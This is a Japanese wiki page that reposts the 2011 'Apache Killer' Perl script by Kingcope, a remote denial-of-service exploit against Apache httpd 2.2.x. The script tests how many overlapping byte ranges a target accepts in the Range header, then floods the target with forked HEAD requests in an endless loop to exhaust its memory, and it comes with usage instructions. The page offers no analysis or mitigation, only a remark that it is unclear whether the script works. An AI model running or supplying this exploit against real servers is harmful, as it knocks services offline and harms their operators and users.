Top > ApacheKiller

Apache 2.2.20対応 Apache Killer

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
$|=1;
use IO::Socket;
use Parallel::ForkManager;

sub usage {
        print "Apache Remote Denial of Service (memory exhaustion)\n";
        print "by Kingcope\n";
        print "usage: perl killapache.pl <http://host/URI> [numforks]\n";
        print "example: perl killapache.pl http://www.example.com/path/of/bigfile.zip 50\n";
}

sub killapache {
  print "ATTACKING $ARGV[0] [using $numforks forks]\n";

  $pm = new Parallel::ForkManager($numforks);

  $|=1;
  srand(time());

  for ($k=0;$k<$numforks;$k++) {
    my $pid = $pm->start and next;

    $x = "";
    my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                 PeerPort => "80",
                                 Proto    => 'tcp');

    $p = "HEAD $uri HTTP/1.1\r\nHost: $host\r\nRange: bytes=$r\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
    #print $p;
    print $sock $p;

    while(<$sock>) {}
    $pm->finish;
  }
  $pm->wait_all_children;
  print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
  my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                 PeerPort => "80",
                                 Proto    => 'tcp');

  $p = "HEAD $uri HTTP/1.1\r\nHost: $host\r\nRange: bytes=$r\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
  #print $p;
  print $sock $p;

  $x = <$sock>;
  if ($x =~ /Partial/) {
        return 1;
  } else {
        return 0;
  }
}

if ($#ARGV < 0) {
        usage;
        exit;
}

$ARGV[0] =~ m/^http\:\/\/([^\/]*)(\/.+)$/;
$host = $1;
$uri  = $2;

if ($#ARGV > 1) {
    $numforks = $ARGV[1];
} else {
    $numforks = 5;
}

$r = '0-1,0-2';
$n = 3;
$v = testapache();

if ($v == 0) {
        print "Host does not seem vulnerable\n";
        exit;
}

print "testing range header ";
while (testapache()){
    print ".";
    $n++;
    $r .= ",0-$n"
}
print " done\n";

$r =~ s/,[0-9]+\-[0-9]+$//g;

while(1) {
  killapache();
}

対応できてるか不明.


新規 編集 添付 名前変更 バックアップ   ホーム バックアップ リンク元   最終更新のRSS